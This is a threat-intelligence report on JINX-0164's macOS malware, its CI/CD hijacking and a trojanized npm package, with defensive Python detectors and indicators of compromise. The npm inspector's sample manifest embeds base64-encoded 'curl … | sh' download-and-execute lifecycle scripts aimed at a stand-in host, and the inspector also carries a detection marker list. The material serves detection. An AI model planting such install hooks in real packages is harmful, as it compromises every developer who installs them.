From AUDIOFIX to MINIRAT: JINX-0164’s macOS and Supply Chain Compromise Lifecycle

A new threat actor, tracked by Wiz as JINX-0164, has emerged with a narrow focus on the cryptocurrency sector. Unlike generic malware campaigns, its attack lifecycle is engineered to run from social engineering of individual developers all the way to software supply chain compromise.

By targeting software developers, the people who hold write access to build and release systems, JINX-0164 has shown it can pivot from a single macOS endpoint into CI/CD (Continuous Integration/Continuous Deployment) environments. That pivot moves the actor beyond simple data theft toward corrupting the software distribution pipeline itself.

The Attack Lifecycle: From LinkedIn Lures to AUDIOFIX Deployment

The intrusion methodology begins with high-fidelity social engineering. The group leverages recruitment-themed lures on professional networks like LinkedIn, impersonating legitimate business contacts to build rapport with high-value targets. A typical engagement involves an invitation to a virtual technical interview or business meeting.

During these interactions, victims are redirected to a malicious domain designed to mimic legitimate collaboration tools, such as Microsoft Teams. Upon downloading what appears to be a necessary conferencing client, the victim unwittingly executes a multi-stage infection chain:

  1. Initial Execution: A bash script served from a spoofed Apple driver domain (listed in the IOC table below as a fake "audio fix" dropper) deploys AUDIOFIX, a Python-based macOS malware.
  2. Persistence Mechanism: The malware masquerades as coreaudiod, the name of macOS's legitimate Core Audio daemon, and registers a launchd job via launchctl so that it is relaunched after every reboot.
  3. C2 Communication: Once active, the malware establishes an encrypted command-and-control (C2) channel over HTTPS; the IOC table also lists a Dropbox-themed AUDIOFIX variant alongside the HTTPS one.
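To make the persistence step concrete, the following Python script (an added example, not Wiz's tooling or code from the malware) audits launchd property lists for the pattern just described: a LaunchAgent or LaunchDaemon whose Label borrows an Apple name such as coreaudiod while its real payload is a Python script under a user-writable path. The two plists and the paths in them are constructed for illustration; the heuristics (Apple-style label outside /System, interpreter plus script in a user-writable directory, RunAtLoad/KeepAlive set) are this example's assumptions about what a disguised launch item looks like, not indicators published with the report.

```python
"""Audit launchd property lists for the coreaudiod-style persistence described above.

Added example, not Wiz's tooling or the malware's own code. Assumptions: the
persistence item is a LaunchAgent/LaunchDaemon plist whose Label borrows a
legitimate Apple name (here coreaudiod) while its real payload is a Python
script outside Apple's system directories. The two plists below are
constructed for illustration; scan_dirs() applies the same rules to a live host.
"""
import plistlib
from pathlib import Path
from typing import Iterable
from xml.parsers.expat import ExpatError

# Where launchd looks for per-user and system-wide launch items.
LAUNCHD_DIRS = ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons")
# Apple-shipped executables live here; the real Core Audio daemon is /usr/sbin/coreaudiod.
APPLE_PREFIXES = ("/System/", "/usr/sbin/", "/usr/libexec/", "/usr/bin/")
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
INTERPRETERS = {"python", "python3", "sh", "bash", "zsh", "osascript", "perl"}


def argv_of(plist: dict) -> list[str]:
    """Command line launchd would execute (ProgramArguments wins over Program)."""
    if "ProgramArguments" in plist:
        return [str(a) for a in plist["ProgramArguments"]]
    if "Program" in plist:
        return [str(plist["Program"])]
    return []


def effective_program(argv: list[str]) -> str:
    """What really runs: the script when argv[0] is an interpreter, else argv[0]."""
    if Path(argv[0]).name in INTERPRETERS and len(argv) > 1:
        return argv[1]
    return argv[0]


def classify(plist: dict, path: str = "") -> list[str]:
    """Heuristic reasons a launch item deserves review; an empty list means nothing flagged."""
    reasons: list[str] = []
    argv = argv_of(plist)
    if not argv:
        return reasons
    label = str(plist.get("Label", ""))
    apple_like = label.startswith("com.apple.") or "coreaudiod" in label.lower()
    target = effective_program(argv)
    # Apple-looking label whose real payload lives outside Apple's directories.
    if apple_like and not target.startswith(APPLE_PREFIXES):
        reasons.append(f"label {label!r} claims Apple origin but runs {target}")
    # Apple's own launch items are under /System; an Apple-style label elsewhere is suspect.
    if apple_like and path and not path.startswith("/System/"):
        reasons.append(f"Apple-style label installed outside /System: {path}")
    # An interpreter executing a script from a user-writable location.
    if Path(argv[0]).name in INTERPRETERS and target.startswith(USER_WRITABLE):
        reasons.append(f"{Path(argv[0]).name} runs {target} from a user-writable path")
    # Persistence flags only matter once something above already looks wrong.
    if reasons and (plist.get("RunAtLoad") or plist.get("KeepAlive")):
        reasons.append("RunAtLoad/KeepAlive set: relaunched at login or boot")
    return reasons


def audit(items: Iterable[tuple[str, bytes]]) -> dict[str, list[str]]:
    """Classify (path, raw plist) pairs; returns {path: reasons} for flagged items only."""
    findings: dict[str, list[str]] = {}
    for path, raw in items:
        try:
            data = plistlib.loads(raw)
        except (plistlib.InvalidFileException, ExpatError):
            findings[path] = ["unparseable plist"]
            continue
        reasons = classify(data, path)
        if reasons:
            findings[path] = reasons
    return findings


def scan_dirs(dirs: Iterable[str] = LAUNCHD_DIRS) -> dict[str, list[str]]:
    """Run audit() over the launchd directories of the current macOS host."""
    items = []
    for d in dirs:
        for p in Path(d).expanduser().glob("*.plist"):
            items.append((str(p), p.read_bytes()))
    return audit(items)


# Constructed samples: a disguised agent modelled on the article's description, and a benign daemon.
SAMPLE_PLISTS = [
    ("/Users/dev/Library/LaunchAgents/com.apple.coreaudiod.plist", b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.coreaudiod</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python3</string>
    <string>/Users/dev/Library/Application Support/coreaudiod/coreaudiod.py</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""),
    ("/Library/LaunchDaemons/com.example.backup.plist", b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>Program</key><string>/usr/local/bin/backup-agent</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""),
]

if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_PLISTS).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

On a real host, scan_dirs() reads ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; a hit is a lead to compare against the genuine /usr/sbin/coreaudiod and Apple's own launch items under /System/Library, not a verdict on its own.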

According to Wiz's research, JINX-0164 has been operational since mid-2025. The group is financially motivated, and AUDIOFIX is built to harvest macOS Keychain credentials, SSH keys, cloud provider tokens, and cryptocurrency wallet data. Stolen passwords are staged locally in XOR-encoded form before exfiltration.

Lateral Movement and CI/CD Pipeline Hijacking

What distinguishes JINX-0164 from standard credential harvesters is their methodology for lateral movement. Rather than focusing solely on cloud permission escalation, they target the integrity of the development workflow itself.

Using stolen GitHub tokens, the attackers run tools such as nord-stream (an open-source utility for dumping secrets from CI/CD pipelines) to extract pipeline secrets, then push malicious code into legitimate repositories. A key forensic indicator is GitHub's "Unverified" badge on the injected commits: the commit is attributed to an existing contributor, but the GPG key used to sign it (or the absence of any signature) does not match the key that author has historically used, so GitHub cannot tie the commit to the claimed identity.

Figure: snippet of the unverified commit that carried the malicious payload (Source: Wiz).

This gives the implant a propagation vector: as developers pull the compromised code onto their workstations or build servers, the infection spreads through the organization's own development ecosystem. GitHub's vigilant mode helps here: once a contributor enables it, every commit attributed to them that is not signed with a key registered on their account is displayed as Unverified, which makes a forged author identity stand out in the history.
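The same check can be run locally, outside GitHub. The script below is an added example (not Wiz's or GitHub's code) that mirrors the Unverified indicator with plain git: it builds each author's established signing key from trusted history and flags commits in the window under review that are unsigned, unverifiable, or signed with a different key. It consumes the output of git log --format='%H|%G?|%GK|%ae|%an|%s', which needs gpg and the contributors' public keys available locally; the key IDs, addresses and log lines are constructed, not taken from the affected repository.

```python
"""Spot commits whose signature does not match the author's established signing key.

Added example, not Wiz's or GitHub's code: it is the local-git analogue of the
Unverified badge, run over the output of
    git log --format='%H|%G?|%GK|%ae|%an|%s'
(%G? is git's signature status, %GK the signing key ID; see git-log(1)).
The key IDs, e-mail addresses and log lines below are constructed, not taken
from the compromised repository.
"""
from collections import defaultdict
from dataclasses import dataclass

GIT_FORMAT = "%H|%G?|%GK|%ae|%an|%s"

# Meaning of git's %G? placeholder.
STATUS = {
    "G": "good signature",
    "B": "bad signature",
    "U": "good signature with unknown validity",
    "X": "good signature that has expired",
    "Y": "good signature made by an expired key",
    "R": "good signature made by a revoked key",
    "E": "signature cannot be checked (key missing)",
    "N": "no signature",
}


@dataclass
class Commit:
    sha: str
    status: str
    key: str
    email: str
    name: str
    subject: str


def parse_log(text: str) -> list[Commit]:
    """Parse lines produced with GIT_FORMAT into Commit records."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("|", 5)  # the subject may itself contain '|'
        if len(fields) != 6:
            raise ValueError(f"unexpected log line: {line!r}")
        commits.append(Commit(*fields))
    return commits


def baseline_keys(history: list[Commit], min_good: int = 2) -> dict[str, set[str]]:
    """Author e-mail -> keys that have signed at least `min_good` good (G) commits.
    Assumption: an author's established identity is a key seen repeatedly on
    verified commits in trusted history (e.g. main before the suspicious push)."""
    counts: dict[str, dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for c in history:
        if c.status == "G" and c.key:
            counts[c.email][c.key] += 1
    return {email: {k for k, n in keys.items() if n >= min_good}
            for email, keys in counts.items()}


def audit(commits: list[Commit], baseline: dict[str, set[str]]) -> list[tuple[str, str]]:
    """Return (sha, reason) for each commit that is unsigned, unverifiable, or signed
    with a key the author has not used before."""
    findings = []
    for c in commits:
        known = baseline.get(c.email, set())
        if c.status != "G":
            reason = STATUS.get(c.status, "unknown status " + c.status)
            if c.key and known and c.key not in known:
                reason += f"; key {c.key} never used by {c.email} (known: {sorted(known)})"
            findings.append((c.sha, reason))
        elif known and c.key not in known:
            findings.append((c.sha, f"good signature but key {c.key} never used by {c.email} (known: {sorted(known)})"))
        elif not known:
            findings.append((c.sha, f"no established key for {c.email}; verify out of band"))
    return findings


# Constructed sample: trusted history, then the window under review.
HISTORY = """\
1111111111111111111111111111111111111111|G|ABCDEF0123456789|alice@example.com|Alice|Add wallet adapter
2222222222222222222222222222222222222222|G|ABCDEF0123456789|alice@example.com|Alice|Fix retry logic
3333333333333333333333333333333333333333|G|0123456789ABCDEF|bob@example.com|Bob|Bump dependencies
4444444444444444444444444444444444444444|G|0123456789ABCDEF|bob@example.com|Bob|CI: cache node_modules
"""
RECENT = """\
5555555555555555555555555555555555555555|G|ABCDEF0123456789|alice@example.com|Alice|Refactor config loader
6666666666666666666666666666666666666666|E|FEDCBA9876543210|alice@example.com|Alice|Update build script
7777777777777777777777777777777777777777|N||bob@example.com|Bob|Minor cleanup
"""

if __name__ == "__main__":
    base = baseline_keys(parse_log(HISTORY))
    for sha, reason in audit(parse_log(RECENT), base):
        print(sha[:12], reason)
```

A status of E (key missing) on a commit from an established contributor is the local counterpart of the badge mismatch: a signature is present, but it was not made by any key imported for that author.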

Supply Chain Weaponization: The @velora-dex/sdk Incident

The group's capabilities extend to direct package poisoning. On April 7, 2026, JINX-0164 trojanized version 4.9.1 of the npm package @velora-dex/sdk. The payload used a base64-encoded command to fetch and execute a remote script (the IOC table below lists two droppers delivered this way from 89.36.224.5), which deployed MINIRAT, a lightweight Go-based backdoor.

While AUDIOFIX is designed for heavy data exfiltration, MINIRAT is optimized for stealthy persistence and remote command execution, providing the actor with a secondary, more discreet foothold.
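What the package-level check looks like, as an added example (not Wiz's tooling and not the @velora-dex/sdk payload itself): the script below walks an npm manifest's lifecycle scripts, decodes any base64 blob they carry, and flags download-and-execute markers in either the raw command or the decoded text. The manifest, the embedded commands and the host 198.51.100.10 (an RFC 5737 documentation address) are constructed; the exact obfuscation used in the real package is not reproduced here.

```python
"""Inspect an npm manifest for lifecycle scripts that hide a command in base64.

Added example, not Wiz's tooling and not the @velora-dex/sdk payload itself. It
assumes the shape the article describes: a script that decodes a base64 blob
and hands it to a shell (or evals it in node). The manifest below and the
address 198.51.100.10 (RFC 5737 documentation range) are constructed.
"""
import base64
import binascii
import json
import re

# Scripts npm runs automatically around install/uninstall and before publish.
LIFECYCLE = {"preinstall", "install", "postinstall", "prepare", "preuninstall", "postuninstall"}
# A base64 run long enough to be worth decoding (24 chars = 18 bytes).
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
MARKERS = ("curl ", "wget ", "| sh", "| bash", "/bin/sh", "eval(", "child_process",
           ".exec(", "spawn(", "base64 -d", "base64 --decode", "'base64'")


def decode_blobs(text: str) -> list[tuple[str, str]]:
    """Return (blob, decoded_text) for each base64-looking token that decodes to readable text."""
    out = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # random identifiers rarely decode to valid UTF-8
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            out.append((blob, decoded))
    return out


def inspect_manifest(manifest: dict) -> list[dict]:
    """Flag lifecycle scripts carrying download/exec markers, in the raw command
    or inside a base64 blob it decodes. Returns one finding per script."""
    findings = []
    for name, cmd in manifest.get("scripts", {}).items():
        if name not in LIFECYCLE:
            continue
        decoded = [d for _, d in decode_blobs(cmd)]
        surface = "\n".join([cmd, *decoded])
        markers = [mk for mk in MARKERS if mk in surface]
        if markers or decoded:
            findings.append({"script": name, "command": cmd, "decoded": decoded, "markers": markers})
    return findings


def inspect_package_json(path: str) -> list[dict]:
    """Convenience wrapper for a package.json on disk (e.g. inside an unpacked .tgz)."""
    with open(path, encoding="utf-8") as fh:
        return inspect_manifest(json.load(fh))


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed manifest: one shell-style and one node-style obfuscated lifecycle script.
SHELL_CMD = "curl -fsSL http://198.51.100.10/update.sh | sh"
NODE_CMD = "require('child_process').exec('curl -fsSL http://198.51.100.10/m | sh')"
SAMPLE_MANIFEST = {
    "name": "example-sdk",
    "version": "4.9.1",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": f"echo {_b64(SHELL_CMD)} | base64 -d | sh",
        "test": "jest",
        "prepare": f"node -e \"eval(Buffer.from('{_b64(NODE_CMD)}','base64').toString())\"",
    },
}

if __name__ == "__main__":
    for f in inspect_manifest(SAMPLE_MANIFEST):
        print(f"[{f['script']}] markers={f['markers']}")
        for d in f["decoded"]:
            print("   decodes to:", d)
```

Run it against the package.json inside the published tarball rather than the repository copy: the registry artifact is what npm executes, and the two can differ.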

Figure: the complete attack chain from initial lure to supply chain compromise (Source: Wiz).

Infrastructure analysis reveals shared C2 domains such as datahub[.]ink, cloud-sync[.]online, and byte-io[.]us. The actors also route their access through commercial VPNs, including Mullvad and Astrill, to mask their origin when logging into SaaS and cloud environments.

Threat Intelligence Summary & Recommendations

While JINX-0164 overlaps tactically with North Korean clusters such as UNC1069 and Sapphire Sleet, current intelligence points to separate infrastructure, marking it as a distinct, highly capable threat actor. Its pivot toward macOS and developer-centric workflows is a significant escalation in supply chain risk.

Recommended Defensive Posture:

  • Audit CI/CD Integrity: Review workflow files and GitHub Actions for unauthorized changes, and treat Unverified commit signatures from established contributors as an incident signal rather than a cosmetic badge.
  • Endpoint Monitoring: Alert on new LaunchAgents/LaunchDaemons registered via launchctl, particularly items named after Apple components such as coreaudiod that run Python or shell scripts, and on unexpected Python processes on macOS endpoints.
  • Network Hygiene: Flag anomalous VPN egress (Mullvad, Astrill) in SaaS and cloud sign-in logs, and block or alert on the C2 domains and dropper hosts listed below.
  • Dependency Management: Pin exact versions of third-party packages (npm, PyPI, etc.) and install from a committed lockfile whose integrity hashes are enforced, so that a newly published version such as 4.9.1 cannot be pulled in silently.
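To put the last recommendation into practice, the following added example (not npm's own code) checks a manifest for unpinned specifiers and verifies a fetched tarball against the lockfile's integrity field, which is the Subresource Integrity string (sha512 by default) that npm records in package-lock.json. The manifest, lockfile fragment, resolved URLs and tarball bytes are constructed.

```python
"""Enforce exact version pins and verify lockfile integrity hashes against what was fetched.

Added example, not npm's own code. The manifest, the package-lock fragment and
the tarball bytes are constructed; in real use they come from package.json,
package-lock.json and the downloaded .tgz files.
"""
import base64
import hashlib
import hmac
import re

# Exact semver (MAJOR.MINOR.PATCH, optional prerelease). ^, ~, *, tags and URLs are not pins.
EXACT_RE = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$")


def unpinned(deps: dict[str, str]) -> dict[str, str]:
    """Dependencies whose specifier would let a future publish be resolved without a manifest change."""
    return {name: spec for name, spec in deps.items() if not EXACT_RE.match(spec)}


def sri(data: bytes, algo: str = "sha512") -> str:
    """Subresource Integrity string in the form npm stores in `integrity` fields."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def verify_tarball(data: bytes, expected: str) -> bool:
    """Constant-time comparison of a fetched tarball against the lockfile's integrity value."""
    algo, sep, _ = expected.partition("-")
    if not sep or algo not in hashlib.algorithms_available:
        return False
    return hmac.compare_digest(sri(data, algo), expected)


def audit_lock(lock: dict, fetched: dict[str, bytes]) -> dict[str, str]:
    """Check every lockfile package for which tarball bytes are available.
    Returns {package_path: problem} for missing or mismatched integrity."""
    problems = {}
    for pkg_path, entry in lock.get("packages", {}).items():
        if pkg_path == "" or pkg_path not in fetched:  # "" is the root project itself
            continue
        integrity = entry.get("integrity")
        if not integrity:
            problems[pkg_path] = "no integrity field (lockfile cannot protect this package)"
        elif not verify_tarball(fetched[pkg_path], integrity):
            problems[pkg_path] = f"integrity mismatch: fetched {sri(fetched[pkg_path])}"
    return problems


# Constructed inputs: a manifest with two range specifiers, a lockfile, and two tarball payloads.
MANIFEST_DEPS = {"@example/sdk": "^4.9.0", "left-pad": "1.3.0", "lodash": "latest"}
GOOD_TARBALL = b"constructed tarball bytes for @example/sdk@4.9.0"
SWAPPED_TARBALL = b"constructed tarball bytes with an injected install script"
LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/@example/sdk": {
            "version": "4.9.0",
            "resolved": "https://registry.npmjs.org/@example/sdk/-/sdk-4.9.0.tgz",
            "integrity": sri(GOOD_TARBALL),
        },
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
        },
    },
}

if __name__ == "__main__":
    print("unpinned:", unpinned(MANIFEST_DEPS))
    print("clean install:", audit_lock(LOCK, {"node_modules/@example/sdk": GOOD_TARBALL}))
    print("swapped tarball:", audit_lock(LOCK, {"node_modules/@example/sdk": SWAPPED_TARBALL,
                                                "node_modules/left-pad": b"whatever"}))
```

npm ci performs the same comparison and aborts when the hash in package-lock.json does not match the downloaded tarball, so committing the lockfile and installing with npm ci instead of npm install is the everyday form of this check; the unpinned() pass is what stops a ^ range from resolving to a freshly published version in the first place.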

Indicators of Compromise (IOCs)

Malware    Variant / theme (infrastructure)               SHA-256 hash
MINIRAT    ARM64                                          0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270
MINIRAT    x86_64                                         0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d
MINIRAT    ARM64                                          a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b
AUDIOFIX   HTTPS / ARM64                                  65cba741fe30fa4799fb9002ea8de6d96042a59159dd7c3419c766af24c835e6
AUDIOFIX   HTTPS / x86_64                                 0b1a36a31b952341a534fe24890f1ed2921ee259773cff46e4f6273b8c4d5d21
AUDIOFIX   Dropbox / ARM64                                e8ee6f5145c9d503c5130bfc6585567f6e19d409158c3c0ca0b259f1875b15f4
AUDIOFIX   Dropbox / x86_64                               3e3901519c2305fbe9d5483b7234c25c6d2b562512916481d96f26b849c39fdb
Dropper    Fake audio fix (apple.driver-store.com)        9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a
Dropper    Fake audio fix (apple.driver-update.io)        402625ec79e3573a80b6de9b33fc1e503e3c7803603cd958ddd515fb0549007c
Dropper    Fake audio fix (driver-updater.net)            b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17
Dropper    Fake Chrome update (apple.driver-store.com)    d4e863f9818bfb2f1dd932df6441dff204e6142c3bdb55b298cb08dc7b6a0c62
Dropper    Delivered via supply chain (89.36.224.5)       c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e
Dropper    Delivered via supply chain (89.36.224.5)       2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460

Network indicators named in the text above: C2 domains datahub[.]ink, cloud-sync[.]online and byte-io[.]us; supply-chain dropper host 89.36.224.5.
